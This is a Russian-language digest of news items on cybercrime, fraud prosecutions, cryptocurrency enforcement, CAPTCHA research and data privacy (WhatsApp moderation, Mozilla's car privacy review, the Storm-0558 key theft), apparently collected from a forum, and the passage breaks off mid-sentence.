Мошенничество в Wirecard стало самым крупным в истории немецкого бизнеса. В 2020 году прокуратура Мюнхена объявила о начале расследования пропажи двух миллиардов долларов со счетов финтех-стартапа. По некоторым сведениям, на следующий день Марсалек на частном самолете вылетел в Минск. Бывшие коллеги Марсалека вспомнили в беседах с журналистами, что он нередко хвастался связями со спецслужбами, а также хранил на рабочем столе в офисе статуэтку президента России Владимира Путина.
source: wsj.com/world/europe/hes-wanted-for-wirecards-missing-2-billion-hes- now-suspected-of-being-a-russian-spy-61d79ee2
Группа учёных опубликовала статью под названием «Эмпирическое исследование и оценка современных CAPTCHA», в которой утверждает, что боты лучше справляются с тестами CAPTCHA, чем люди.
Исследователи из Калифорнийского университета в Ирвайне, Высшей технической школы в Цюрихе, Ливерморской национальной лаборатории им. Э. Лоуренса и Microsoft провели эксперимент, в котором изучали поведение людей при прохождении различных тестов CAPTCHA. Они попросили 1,4 тыс. человек пройти 14 тыс. тестов. Каждый участник должен был выполнить 10 видов тестов: reCAPTCHA, reCAPTCHA v2, два игровых от Arkose Labs (один с использованием стрелок для поворота объекта, другой с выбором вертикального объекта), два hCAPTCHA (один с простыми и один со сложными настройками), один на основе слайдера от Geetest и три с разными типами искажения текста.
Учёные не нашли связи между временем прохождения капчи и её оценкой участниками. То есть людям не всегда нравятся те тесты, которые можно пройти быстрее. Интересна корреляция между возрастом и уровнем образования участников эксперимента и временем, которое они тратили на прохождение капчи: во многих случаях люди с учёной степенью быстрее решали тесты (остальные группы показывали примерно одинаковые результаты); возраст увеличивал время прохождения теста на 0,09 сек. за каждый год жизни.
В конце учёные сопоставили результаты людей при прохождении капчи с результатами ботов, которые они взяли из других источников. В результате выяснилось, что человеческие показатели хуже машинных: например, когда людей просили решить тесты с искажённым текстом, им нужно было от 9 до 15 сек. и они давали правильный ответ только в 50% – 84% случаев. Боты делали то же самое менее чем за секунду и достигали точности 99,8%.
Сравнение времени и точности прохождения капчи людьми и ботами Сравнение времени и точности прохождения капчи людьми и ботами. Кроме того, исследователи проанализировали 200 популярных сайтов и выявили, что 120 из них используют капчу. Самой распространённой оказалась reCAPTCHA, которая присутствовала на 68 сайтах и принадлежит Google.
Один из ученых, профессор Джин Цудик, поделился своими размышлениями с журналом Time по результатам эксперимента: «Почему мы всё ещё используем технологию, которая почти повсеместно не нравится, стоит так дорого (особенно с точки зрения потраченного впустую человеческого времени) и неэффективна против ботов?». Цудик высказал предположение, что частично причина заключается в том, что поставщики капчи, включая Google, «зарабатывают большие деньги, продавая свои услуги, и не хотят добровольно отказываться от своих методов работы». Он также подозревает, что компании, использующие капчу для защиты разных сервисов, таких как создание учётных записей, не желают «признавать, что использование капчи неэффективно».
Для снятия блокировок использовались украденные данные сотрудников T-Mobile.
По словам американских правоохранительных органов, Аргишти Худавердян владел магазином, сотрудничавшим с сотовым оператором T-Mobile . С 2014 по 2019 год мужчина использовал украденные учетные данные более 50 сотрудников T-Mobile для снятия блокировки со смартфонов, чтобы они работали с SIM-картами других операторов. За 5 лет Худавердян успел разблокировать сотни тысяч смартфонов.
Чтобы получить учетные данные, предприимчивый американец использовал фишинг и социальную инженерию, заставляя работников T-Mobile сообщить ему логины и пароли. Худавердян занимался всем: снимал блокировку с украденных и утерянных смартфонов, а также предоставлял свои услуги онлайн, снимая блокировку удаленно.
Стоит отметить, что мужчина работал не один, а с подельником – Аленом Гарехбаглом. Обоим предъявили обвинения в мошенничестве и незаконном доступе к компьютерным системам.
Худавердяну грозит как минимум два года лишения свободы за кражу личных данных при отягчающих обстоятельствах и до 165 лет по пунктам обвинения, связанным с мошенничеством с использованием электронных средств связи, отмыванием денег и несанкционированным доступом к компьютерам. Присяжные уже признали его виновным. Оглашение приговора назначено на 17 октября 2022 года.
Личность злоумышленника частично установлена.
Один из членов Proof Collective стал жертвой мошенника, потеряв 29 высокоценных токенов Moonbird, основанных на Ethereum. Согласно твиту , опубликованному Cirrus в среду утром, жертва потеряла 29 NFT-токенов Moonbird стоимостью 1,5 миллиона долларов после того, как перешла по вредоносной ссылке, которой поделился мошенник.
NFT-инвестор Dollar заявил , что личность мошенника уже частично установлена криптобиржей, а участники Proof Collective в настоящее время работают над полным отчетом для ФБР.
Еще несколько других пользователей утверждают, что тот же мошенник настаивал на использовании фальшивой платформы для заключения сделки.
Неизвестно, сколько всего жертв было обмануто преступником, но последняя кража – суровое напоминание даже самым опытным NFT-инвесторам о том, что нужно быть начеку, когда дело касается мошенников. Специалисты рекомендуют владельцам NFT соблюдать осторожность при работе с незнакомыми платформами и перепроверять сообщения даже от заслуживающих доверия пользователей.
Напомним, не так давно был взломан аккаунт известного NFT-художника Майка Винкельманна. За несколько часов злоумышленники успели заработать 438 тысяч долларов в криптовалюте и NFT.
source: twitter.com/CirrusNFT/status/1529296043547865088 | twitter.com/knownasdollar/status/1529297355396489217
На WhatsApp работает более 1 тыс. подрядчиков, которые изучают пользовательский контент.
Когда в марте 2019 года глава Facebook Марк Цукерберг представил новый подход компании к конфиденциальности, в качестве примера он привел мессенджер WhatsApp и его основную особенность – сквозное шифрование, превращающее сообщения в нечитаемый формат, которые могут просмотреть только те, кому они предназначались. Как уверял Цукерберг, больше никто, даже сама компания, не может их прочитать. Однако, все эти уверения не соответствуют действительности, утверждается в новом материале некоммерческой организации ProPublica, занимающейся журналистскими расследованиями.
Согласно статье, на WhatsApp работает более 1 тыс. подрядчиков в Остине, Техасе, Дублине и Сингапуре, которые изучают пользовательский контент с помощью систем искусственного интеллекта, а также специального программного обеспечения Facebook. Инструмент позволяет анализировать потоки частных сообщений, изображений и видео, на которые компания получила жалобы, например, мошеннический контент, спам, детскую порнографию или материалы, касающиеся потенциального терроризма. Как правило, весь процесс оценки контента занимает не более 1 минуты.
В основном специфика работы модератором в WhatsApp схожа с Facebook или Instagram, пишет ProPublica. При этом в объявлении о поиске сотрудников указывается «изучение контента», но не упоминаются ни Facebook, ни WhatsApp. За свою работу модераторы получают от $16,5 в час. Всем, кто спросит, сотрудники должны отвечать, что работают на компанию Accenture (в самой Accenture отказались от комментария). Также они подписывают договор о неразглашении.
Поскольку контент в WhatsApp зашифрован, ИИ-системы не могут автоматически просканировать все чаты, изображения или видео, как это происходит в Facebook и Instagram.
По словам бывших инженеров WhatsApp, модераторы получают доступ к частному контенту, когда пользователь пожалуется на сообщение, предположительно нарушающее политику сервиса. Далее это сообщение вместе с четырьмя предыдущими в диалоге перенаправляется модератору в незашифрованном виде и ставится в очередь.
Незашифрованные данные включают имена и изображения в профиле пользователя, номер телефона, статус, уровень заряда аккумулятора, язык и временную зону, идентификатор телефона, IP-адрес и ОС, мощность беспроводного сигнала, связанные аккаунты в Facebook и Instagram, дату последнего использования приложения и историю нарушений.
В комментарии к статье представитель Facebook заявил, что:
«Мы строим WhatsApp таким образом, что ограничивает сбор данных, но предоставляет инструменты, позволяющие бороться со спамом, изучать угрозы и банить нарушителей, в том числе на основании жалоб пользователей».
В компании также отметили, что в WhatsApp добавлены новые инструменты для защиты конфиденциальности, в частности, исчезающие сообщения.
«Судя по обратной связи, которую мы получаем от пользователей, мы уверены, что люди понимают, что когда они отправляют сообщение WhatsApp, мы получаем отправленный ими контент», - отметил представитель Facebook.
«Сотрудники УБК МВД России совместно с коллегами из УВД по ТиНАО ГУ МВД России по г. Москве задержали 12 жителей столичного региона. Они подозреваются в мошенничестве, совершенном организованной группой в особо крупном размере», — сообщила официальный представитель МВД России Ирина Волк.
Предварительно установлено, что злоумышленники разработали и реализовали криминальную схему хищения денежных средств граждан и организаций из разных регионов России. В течение нескольких лет они создавали интернет-ресурсы, на которых от имени юридических лиц и индивидуальных предпринимателей предлагали приобрести дорогостоящую сельскохозяйственную технику по ценам ниже рыночных. Обратившимся аферисты высылали подписанный договор купли-продажи, требуя внести предоплату. После перечисления денег переставали выходить на связь и взятые на себя обязательства не выполняли.
По имеющимся данным, фигуранты могут быть причастны к нескольким сотням преступлений, в результате совершения которых потерпевшим причинен ущерб на сумму свыше миллиарда рублей.
«В жилищах подозреваемых проведены обыски. Полицейские изъяли 24 единицы компьютерной техники, 75 модемов для выхода в Интернет, мобильные устройства, 56 печатей, документы юридических лиц и индивидуальных предпринимателей, денежные средства в сумме свыше 3 млн рублей и другие предметы, имеющие доказательственное значение.
Следователем Следственного управления УВД по ТиНАО ГУ МВД России по г. Москве задержанным предъявлено обвинение в совершении 21 эпизода преступлений, предусмотренных частью 4 статьи 159 УК РФ. В отношении них избраны различные меры пресечения.
Следователи и полицейские проводят мероприятия, направленные на установление всех соучастников и эпизодов противоправной деятельности», — уточнила Ирина Волк.
Киберполицейские и следователи разоблачили жителя областного центра, который создавал в соцсети фейковые объявления о помощи военным. Особая циничность заключалась в том, что «благотворитель» использовал фото настоящих украинских воинов, а также людей, пострадавших в результате несчастных случаев еще до полномасштабного вторжения.
Оперативники киберполиции и следователи Житомирского районного управления полиции под процессуальным руководством Житомирской окружной прокуратуры при содействии Управления уголовного розыска ГУНП области разоблачили 42-летнего жителя областного центра, который размещал в социальной сети фейковые объявления о сборе денег в помощь защитникам и защитницам Украины, пострадавшим от действий страны-агрессора.
В частности, в созданных в течение 2023-2024 годов заметках фигурант размещал фото реальной украинской военной, которая выполняет задачи по защите нашего государства. Рядом с ней - фото другой девушки с ампутированными конечностями, которая на самом деле потеряла их еще в 2021 году в результате несчастного случая на железной дороге. Ее родные действительно продолжают собирать средства на реабилитацию девушки. При этом, в заметке мошенник сообщал, что на первом и втором фото - именно военная, которая якобы была ранена на войне.
Выдавая из себя благотворителя, злоумышленник просил сбросить средства якобы на лечение и протезирование военной на подконтрольные ему банковские карты.
По предварительным данным фигурант таким образом обманул десятки человек. Общая сумма убытков составляет около 300 тысяч гривен.
В июне этого года полицейские провели обыски по месту регистрации и жительства фигуранта. Изъяты компьютерная техника, мобильные телефоны, 10 банковских карт, стартовые пакеты мобильных операторов и компьютерная техника.
Следователи объявили фигуранту подозрение по ч. 1, 2 ст. 190 (Мошенничество) Уголовного кодекса Украины. Ему грозит до трех лет лишения свободы.
Сейчас следственные действия продолжаются, устанавливается окончательное количество пострадавших и полная сумма нанесенного ущерба. Возможна дополнительная квалификация преступления.
zhit.gp.gov.ua/ua/news.html?_m=publications&_c=view&_t=rec&id=364212
Сотрудниками Отдела по борьбе с противоправным использованием информационно- телекоммуникационных технологий УМВД России по Вологодской области пресечена деятельность группировки, которая специализировалась на кибермошенничествах.
«По версии следствия, в 2022 и 2023 годах злоумышленники получали неправомерный доступ к личным кабинетам граждан на Едином портале государственных и муниципальных услуг. Завладев персональными данными, они направляли онлайн-заявки для получения кредитов в микрофинансовые организации в разных городах России. Получив одобрение, они выводили денежные средства посредством электронных кошельков и банковских карт, оформленных на третьих лиц, а затем делили их между собой. От противоправных действий пострадали порядка двухсот жителей различных регионов России», - сообщила официальный представитель МВД России Ирина Волк.
В ходе обысков изъяты компьютеры, ноутбуки, мобильные телефоны, сим-карты различных мобильных операторов, а также денежные средства.
«Следователем СУ УМВД России по г. Вологде в отношении подозреваемых возбуждены уголовные дела по признакам преступлений, предусмотренных статьями 159 и 272 УК РФ. Фигурантам избрана мера пресечения в виде подписки о невыезде и надлежащем поведении. Предварительное расследование продолжается», - добавила Ирина Волк.
Злоумышленником оказался 24-летний марокканец. Он был задержан в муниципалитете Манакор сотрудниками Национальной полиции Испании за использование бота, который блокирует систему онлайн-записи на приём в экстранхерию.
Отмечается, что хакер рассчитывал впоследствии перепродавать записи.
Так, приезжие иностранцы жаловались на отсутствие доступа к системе записи. Выяснилось, что кто-то злоупотреблял ботами, которые в автоматическом режиме бронировали все доступные места. В результате, соискателям приходилось платить от 50 до 90 евро за возможность записаться на прием в государственный орган.
Сообщается, что подобное нарушение спровоцировало полную блокировку бесплатного доступа к государственной услуге.
В рамках этого дела еще в марте прошлого года в Барселоне допросили несколько свидетелей. Один из них поведал о связи с одним из создателей бота через Telegram. По его словам, тот проживал на Майорке и использовал псевдоним «Самурай». В дальнейшем на основе показаний других свидетелей полицейским удалось идентифицировать подозреваемого.
В минувший вторник, 9 апреля, в доме подозреваемого в Манакоре провели обыске. В частности, в его комнате обнаружили большие суммы наличных денег, а также мобильный телефон, ноутбук и настольный компьютер.
Банковские счета марокканца оперативно заблокировали, а его самого задержали и официально обвинили в совершении преступления, связанного с информационными технологиями.
Сотрудниками Управления уголовного розыска МВД по Республике Саха (Якутия) совместно с коллегами из отдела МВД России по Вилюйскому району в городе Новосибирске задержаны двое посредников дистанционных аферистов, которые занимались переводом похищенных у пожилых россиян денежных средств.
Одной из жертв такого мошенничества стала 66-летняя местная жительница. Женщина пояснила, что ей в одном из мессенджеров от имени её руководителя пришло сообщение о том, что в бухгалтерии проводится проверка, и в ближайшее время с ней свяжется высокопоставленное должностное лицо.
Так и случилось: некий мужчина довёл до неё, что денежные средства с её банковского счёта пытаются похитить мошенники, и, чтобы обезопасить их, посоветовал следовать инструкциям менеджера банка. Далее ей поступил звонок якобы от сотрудника Центробанка, который убедил гражданку через приложение банка направить 170 тысяч рублей своих накоплений на «безопасный счёт».
Для убедительности злоумышленники направляли ей через мессенджер поддельные платёжные документы, удостоверения, а также сообщили, что она пользуется устаревшей версией приложения банка. Поверив им, женщина выполнила все инструкции и в итоге лишилась денег.
В этой криминальной схеме, по версии полиции, двое жителей Новосибирска выступали так называемыми обнальщиками: они снимали деньги с банковских карт, на которые потерпевшие направляли свои сбережения, а потом переводили их на счета нанимателей. Со слов задержанных, в день они обналичивали от 30 тысяч до 3 миллионов рублей.
По месту проживания подозреваемых проведены обыски, в ходе которых изъяты более 10 банковских карт и наличные денежные средства.
Следователем районного отдела полиции возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159 Уголовного кодекса Российской Федерации. Подозреваемые задержаны в порядке ст. 91 УПК РФ и в ближайшее время будут доставлены в Вилюйский район для следственных действий.
Безопасники Гугла опубликовали отчёт по нулевым дням 2023-го. Прошлый год отметился 97 уязвимостями, которые эксплойтили в сетевых дебрях. На 50 с лишним процентов больше, чем в 2022-м, но рекордные 106 из 2021-го не побиты.
Из ключевого: вложения в инфобез оправдывают себя (кто бы мог подумать), злоумышленники переключились на сторонние компоненты и библиотеки, а число атак по корпоративному софту продолжает расти. По части спонсирования госгруппировок по-прежнему ожидаемо лидирует Китай. А эксплойты от финансово- мотивированных злоумышленников пошли на спад, в то время как производители спайвари отметились использованием 50 процентов нулевых дней за прошлый год, лидируя в браузерных и мобильных эксплойтах. Сомнительный спайварь-пьедестал делят израильтяне и итальянцы, разрабатывающие Pegasus c Predator и Epeius, Hermit, Skygofree и VBiss, соответственно. Подробнее о нулевых днях 2023-го в [отчёте](https://storage.googleapis.com/gweb-uniblog-publish- prod/documents/Year_in_Review_of_ZeroDays.pdf) (PDF).
Федеральная прокуратура США обвинила криптовалютную биржу KuCoin и двух ее основателей в отмывании $9 млрд.
По данным властей, основатели платформы Чун (Майкл) Ган и Ке (Эрик) Танг с 2017 до 2023 года не внедряли KYC/AML-процедуры, хотя обслуживали свыше 30 млн клиентов. Впоследствии идентификация и верификация не распространялись на уже существующих пользователей.
Таким образом, биржа фактически «использовалась для отмывания доходов от подозрительной и преступной деятельности, включая нарушение санкций, даркнет- рынки и программы-вымогатели».
Согласно обвинительному заключению, с августа 2022 по ноябрь 2023 года 197 депозитных адресов KuCoin прямо или косвенно получили криптовалюты на сумму более $3,2 млн от подсанкционного миксера Tornado Cash.
Кроме того, биржа не была зарегистрирована в FinCEN как компания, предоставляющая финансовые услуги. Как минимум один из ее инвесторов был введен в заблуждение относительно легальной работы биржи на территории США.
Именно обширная клиентская база в США, по мнению прокуратуры, позволила KuCoin стать одной из крупнейших в мире криптовалютных бирж «с миллиардами долларов ежедневного объема торгов».
Помимо нарушений законов о банковской тайне и правил борьбы с отмыванием денег, платформа не подавала отчеты о подозрительной активности.
Отдельный иск в отношении KuCoin подала CFTC. Она также обвиняет платформу в несоблюдении KYC и в отсутствии регистрации в качестве брокера по фьючерсным контрактам, платформы для исполнения свопов или авторизованного рынка деривативов.
CFTC требует денежных штрафов, запретов на торговлю, регистрацию и судебного запрета, в то время как Минюст требует конфискации активов наряду с уголовными наказаниями.
В общей сложности бирже KuCoin и ее основателям вменяют получение более $5 млрд и отправку более $4 млрд подозрительных и преступных средств.
Пока что Ган и Танг не арестованы.
На фоне новости нативный токен KuCoin упал на 15%, по данным CoinGecko.
Напомним, в марте 2023 года Офис генерального прокурора штата Нью-Йорк обвинил KuCoin в нарушении законодательства о ценных бумагах путем нелицензированного предложения цифровых активов, а также оказании брокерских услуг без регистрации.
В декабре в рамках досудебного сообщения платформа согласилась выплатить более $22 млн.
sc: .justice[.]gov/usao-sdny/pr/prominent-global-cryptocurrency-exchange- kucoin-and-two-its-founders-criminally
В России могут быть введены новые правила оборота SIM-карт – в частности, предлагается не активировать их до тех пор, пока МВД не проведет проверку нового абонента. Новые меры могут усложнить процесс подключения к сотовым сетям для граждан России и спровоцировать рост их любви к «серым» SIM-картам.
Еще несколько оборотов гайки
Российские власти рассматривают возможность усиления контроля за рынком SIM- карт и введения новых ограничительных мер. Как пишет «Коммерсант», в планы входит изменение алгоритма активации SIM-карты, что потенциально может лишить россиян возможности пользоваться новым номером сразу после приобретения.
Сейчас механизм активации SIM-карты в России работает следующим образом. Гражданин или гость страны, посетив салон связи или заказав SIM-карту удаленно, может сразу после ее получения вставить ее в свой телефон и совершать звонки, выходить в интернет и пр. Паспортные данные, которые он передал оператору связи при заключении договора, отправятся на проверку в Министерство внутренних дел России (МВД) в течение месяца с момента заключения договора.
Власти хотят избавиться от этого алгоритма и заставить операторов активировать свежекупленную SIM-карту лишь после проверки паспортных данных абонента в МВД. Сколько времени потребуется на такую проверку, неизвестно.
Ждать придется долго
Сейчас проверка нового абонента, подключившегося к сети федерального или регионального оператора, проходит силами сотрудников МВД в «фоновом режиме». Другими словами, россиянину не нужно думать о том, что его номер не будет работать, пока правоохранительные органы не удостоверятся, что он предоставил достоверные паспортные данные – он просто пользуется оплаченными из своего кармана услугами оператора.
По словам собеседника издания, конкретных сроков, в течение которых должна быть проведена сверка паспортных данных нового абонента с базой МВД, в настоящее время нет. Он подчеркнул, что в случае принятия новой инициативы властей на это будет уходить не менее двух дней.
Фактически, этот процесс может занять и больше времени. «Все будет зависеть от интеграции систем», – подчеркнул источник издания.
Власти все отрицают
Об ужесточении мер пополнения абонентской базы сотовых операторов изданию сообщили источники в двух из четырех операторах «большой четверки». По их словам, в настоящее время инициатива обсуждается представителями Минцифры и МВД с участниками рынка и другими ведомствами.
В Минцифры уточнили изданию, что с такой инициативой министерство не выступало. В то же время собеседники «Коммерсанта» в одном из крупнейших федеральных операторов заявил, что прямо сейчас новая идея российских властей еще «не оформлена в законодательную инициативу». Другими словами, законопроект, который мог бы быть внесен на рассмотрение в Госдуму, пока не подготовлен.
Испытание для МВД
Новая инициатива властей – это потенциальные трудности не только для операторов связи, но и непосредственно для Министерства внутренних дел, по мнению опрошенных изданием экспертов. Связано это с тем, что в России ежемесячный объем реализуемых SIM-карт исчисляется не десятками и не сотнями тысяч, а миллионами.
По подсчетам директора компании «S+консалтинг» Айсы Бадаевой, всего один крупный российский оператор способен продавать в среднем до 1,5 млн SIM-карт в месяц. По ее словам, при таких объемах МВД потребуется очень эффективно организовать процесс проверки новых абонентов сотовых операторов – в течение не более одного-двух дней. «Иные сроки вызовут значительный негатив на стороне клиентов», – подчеркнула она.
При этом сами операторы – не единственные распространители SIM-карт в России. Айса Бадаева упомянула также мультибрендовую крупную розницу (сети магазинов по продаже электроники и техники) и локальных дистрибьюторов. На них приходится в среднем до 15% проданных SIM-карт крупных операторов связи, подсчитала Бадаева.
Больше требований – меньше «белых» SIM-карт
В случае вступления изменений в силу рынок продаж SIM-карт в России может претерпеть масштабные изменения. «С введением МВД дополнительной проверки SIM- карт, вероятно, первой из процесса продаж выпадет мелкая локальная розница, поскольку усложнение процесса проверки приведет к значительному увеличению нагрузки на сотрудников, – сказала изданию Айса Бадаева. – Если процесс по дополнительной проверке со стороны МВД будет организован грамотно, то крупные мультибренды, скорее всего, будут продолжать продажи. Если единственным каналом продаж останется официальная розница операторов, то им важно будет обеспечить высокую доступность точек для клиентов и оптимизировать процесс (например, запустить выездной сервис)».
Операторы связи полагают, что ничего хорошего нововведение не принесет. Как сообщил изданию представитель одного из них, из-за него будет затруднен процесс заключения новых договоров на оказание услуг связи как с иностранцами, имеющими паспорта других государств, так и с россиянами. Также это может уничтожить давно налаженный процесс дистанционного оформления SIM-карт и заставить россиян начать смотреть в сторону «серых» SIM-карт. «Это само по себе может спровоцировать нелегальный оборот SIM-карт, тем самым обесценив предпринятые ранее усилия по обелению рынка мобильной связи», – добавил представитель оператора.
В список этих усилий, помимо прочего, входят новые штрафы за продажу «серых» SIM-карт, оформленных без предъявления паспорта. Соответствующие изменения были внесены в конце 2022 г. в ст. 13.29 КоАП РФ «Неисполнение установленных законодательством России в области связи требований к заключению договоров об оказании услуг связи, несоблюдение порядка проверки достоверности сведений об абоненте и сведений о пользователях услугами связи абонента - юридического лица либо индивидуального предпринимателя либо оказание услуг связи в случае отсутствия в федеральной государственной информационной системе "Единая система идентификации и аутентификации в инфраструктуре, обеспечивающей информационно-технологическое взаимодействие информационных систем, используемых для предоставления государственных и муниципальных услуг в электронной форме" сведений, внесение которых является обязательным».
Согласно новым правилам, с 1 марта 2023 г. размер штрафа за этот проступок для должностных лиц достигает 50 тыс. руб., а для юридических – 500 тыс. руб.
Также весной 2023 г. операторы связи начали давить на своих абонентов, заставляя их самостоятельно подтверждать собственные паспортные данные. От них требовали прислать фото лица с открытым паспортом или посетить салон связи для проверки личности. За непослушание операторы грозили блокировкой номера.
Теперь горе-преступник ответит за себя и всех своих киберподельников.
Нигерийца, экстрадированного в США, на днях признали виновным в участии в мошенническом схеме по компрометации корпоративной электронной почты (BEC- атака) на многие миллионы долларов.
29-летний Коси Гуднесс Саймон-Эбо в прошлую пятницу сознался в сговоре по проведению мошенничества через банковские переводы и заговоре по отмыванию денег.
С февраля по июль 2017 года Саймон-Эбо вместе с несколькими соучастниками, включая живущих в американском штате Мэриленд, незаконно получал доступ к почтовым аккаунтам жертв и убеждал их перевести средства на банковские счета, контролируемые мошенниками, используя поддельные письма.
По данным судебных документов, Саймон-Эбо и его соучастники отмывали украденные средства, переводя деньги на другие счета, снимая наличные и получая кассовые чеки.
Хотя злоумышленники должны были украсть около 7 миллионов долларов (на такую сумму были высланы поддельные финансовые документы), их реальный доход составил чуть более 1 миллиона. При этом Саймон-Эбо лично контролировал средства в размере 45 925 долларов, сообщает Министерство Юстиции США (DoJ).
В рамках соглашения о признании вины Саймон-Эбо обязан выплатить компенсации и полностью возместить убытки жертвам на вышеобозначенный миллион с лишним долларов.
За сговор в области мошенничества и отмывания денег мужчине грозит максимальное наказание в виде 20 лет тюремного заключения. Саймон-Эбо был экстрадирован из Канады в США 12 апреля 2023 года и лишь на прошлой неделе наконец признал вменённые ему обвинения.
BEC по-прежнему является одним из наиболее эффективных способов заработка для киберпреступников. Согласно предоставленной ФБР информации , в прошлом году данный вид атак стал вторым по доходности и суммарно принёс мошенникам более 2,7 миллиарда долларов.
source:
justice[.]gov/usao-md/pr/nigerian-national-pleads-guilty-his-role-business-
email-compromise-scheme
ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

В рамках проекта «Privacy Not Included» («Конфиденциальность в комплект не входит») инженеры Mozilla Foundation [изучили ](https://foundation.mozilla.org/en/privacynotincluded/articles/its-official- cars-are-the-worst-product-category-we-have-ever-reviewed-for- privacy/)политики конфиденциальности и мобильные приложения 25 крупных автомобильных брендов (включая BMW, Renault, Subaru, Fiat, Jeep, Chrysler, Volkswagen, Toyota, Lexus, Ford, Audi, Mercedes-Benz, Honda, Lincoln, Acura, Kia, GMC, Chevrolet, Hyundai, Nissan и Tesla).
В итоге в организации пришли к выводу, что современные автомобили — это настоящий «кошмар», а также заявили, что все они ужасны с точки зрения конфиденциальности.
Специалисты Mozilla сообщают, что в наши дни практически все авто собирают огромные массивы личных данных о пользователях, а также требуют, чтобы их владельцы разрешали собирать и продавать такую конфиденциальную информацию о себе, как данные об инвалидности, генетическую информацию, шаблоны лиц и даже данные о сексуальной активности.
Данные собираются из самых разных источников. Отслеживается не только то, на какие кнопки человек нажимает в авто, и что он делает в приложениях информационно-развлекательной системы. Также информация поступает и из других источников, включая спутниковое радио и сторонние карты. Даже когда человек просто подключает к авто свой телефон, его спрашивают, согласен ли он поделиться всеми своими контактами и заметками со своим автомобилем.
То есть информация поступает через мобильные приложения, дилерские центры, сайты компаний, автомобильную телематику, датчики, камеры, микрофоны и телефоны, подключенные к системам транспортного средства.
В общей сложности эксперты потратили более 600 часов на изучение политик конфиденциальности 25 крупнейших автомобильных брендов. К сожалению, в итоге выяснилось, что ни одна из компаний не соответствует даже минимальным стандартам безопасности и конфиденциальности, установленным организаций. Все они могут собирать огромное количество персональных данных в десятках различных категорий, связанных как с автомобилем, так и с сопутствующими приложениями.
Так, 84% изученных брендов передают или продают на сторону персональные данные и «предположения» о своих клиентах, основанные на собранной ими информации. Например, данные о том, насколько человек умен, каковы его способности и интересы, могут быть переданы поставщиками услуг, брокерами данных и другим лицам.
Также более половины компаний передадут информацию об автовладельцах государственным или правоохранительным органам на основании простых запросов, без судебного вмешательства.
При этом подавляющее большинство автопроизводителей (92%) не дают людям никакой возможности контролировать свои персональные данные. Исключение составляют европейские бренды Renault и Dacia, которые обязаны соблюдать закон о защите персональных данных GDPR.
«Например, Subaru заявляет, что, будучи пассажиром авто, вы тоже считаетесь пользователем. А будучи пользователем, вы соглашаетесь с их политикой конфиденциальности. Некоторые автомобильные бренды также отмечают, что водитель обязан проинформировать пассажиров о политике конфиденциальности своего автомобиля», — рассказывают эксперты.
Click to expand...
Отдельное место в отчете Mozilla отведено компания Nissan, чью политику конфиденциальности специалисты назвали «самой ошеломляюще жуткой, пугающей, печальной и запутанной» из всех, что они когда-либо читали.
«Nissan прямо заявляет, что в маркетинговых целях они могут собирать и передавать [третьим сторонам] данные о вашей сексуальной активности, информацию о здоровье, генетическую информацию, а также прочие конфиденциальные личные данные, — рассказывают исследователи. — [Также они могут собирать и продавать] третьим сторонам предположения, сделанные на основе любых персональных данных, собранных при создании профиля потребителя, отражающего предпочтения человека, его характеристики, психологические склонности, предрасположенности, аспекты поведения, отношения, умственные способности, умения и склонности».
Click to expand...
Кроме этого в политике конфиденциальности Nissan перечислено, что компания имеет право собирать такую конфиденциальную личную информацию о владельцах авто, как: «номер водительского удостоверения, национальный или государственный идентификационный номер, данные о гражданстве, иммиграционном статусе, расе, национальном происхождении, религиозных и философских убеждениях, сексуальной ориентации, сексуальной активности, точной геолокации, медицинских диагнозах» и так далее.
Хотя технически собрать такую информацию возможно при использовании автомобиля, оснащенного системой контроля за состоянием водителя на основе камер, в политике конфиденциальности Nissan сказано, что источником вышеперечисленной информации может являться «прямой контакт с пользователями и сотрудниками Nissan».
В итоге Mozilla Foundation открыто призывает всех, кто хоть немного заботится о своей конфиденциальности, «держаться как можно дальше от автомобилей, приложений и подключаемых сервисов Nissan».
И хотя политика конфиденциальности Nissan была признана самой жуткой, компания заняла лишь второе место в списке худших автопроизводителей. Самые плохие оценки и первое место от Mozilla получила компании Tesla, поскольку ее функция Autopilot работает со сбоями, а бета-версия программы «Full self-driving» на самом деле не способна управлять автомобилем самостоятельно и часто пытается выполнить очень опасные действия. В итоге исследователи охарактеризовали ее как «ненадежный ИИ».
Аналитики Mozilla Foundation резюмируют, что в наши дни попросту невозможно приобрести автомобиль, созданный с уважением к конфиденциальности пользователей. «Они все плохие», — заключают специалисты, подчеркивая, что автомобили — это худшая категория продуктов, которую организация когда-либо проверяла.
Mozilla пишет, что выбора практически нет — вряд ли 2023 году в продаже в США появился хотя бы один новый автомобиль, который не оснащен встроенным модемом. Аналогичное оборудование теперь предусмотрено и европейскими законами, связанными с работой экстренных служб.
ВЧК-ОГПУ знакомит читателей с автопарком и недавними фото самого разыскиваемого в мире хакера, лидера группировки Evil Corp Максима Якубеца. Он спокойно и очень богато живет в Москве. Безопасность его бизнеса обеспечивали ветеран спецназа ФСБ "Вымпел" Эдуард Бендерский и экс-боец спецподразделения «Альфа» Константин Пеккер, вхожие в высокие кабинеты и обладающие огромными связями в спецслужбах. Бендерский является тестем Максима Якубеца.
VChK-OGPU introduces readers to the fleet and recent photos of the most wanted hacker in the world, the leader of the Evil Corp group Maxim Yakubets. He lives quietly and very richly in Moscow. The security of his business was providedand a veteran of the FSB special forces "Vympel" Eduard Bendersky and an ex-fighter of the special forces "Alpha" Konstantin Pekker, who enter high offices and have huge connections in the special services. Bendersky is the father-in-law of Maxim Yakubets.
Аналитики из компании Wiz [уверены](http://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables- authentication-of-countless-micr), что недавняя кража криптографического ключа MSA (Microsoft account consumer signing key) у компании Microsoft может иметь гораздо более серьезные последствия, нежели взлом учетных записей Exchange Online и Outlook, которые были скомпрометированы китайской группой Storm-0558. По словам экспертов, утечка оказывает влияние на все приложения Azure AD, работающие с Microsoft OpenID v2.0.
Напомню, что о краже ключа MSA и атаке на Exchange Online и Azure Active Directory (AD) более двух десятков организаций по всему миру, включая правительственные учреждения в США и странах Западной Европы, стало известно в середине июля 2023 года.
Тогда сообщалось, что в середине мая злоумышленникам удалось получить доступ к учетным записям Outlook, принадлежащим примерно 25 организациям, а также к некоторым учетным записям пользователей, которые, вероятно, были связаны с этими организациями. Названия пострадавших организаций и госучреждений не были раскрыты. Известно, что в числе пострадавших числятся Госдеп США и Министерство торговли страны.
Как объясняли в Microsoft, для этой атаки злоумышленники использовали токены
аутентификации, подделанные с помощью криптографического ключа MSA (Microsoft
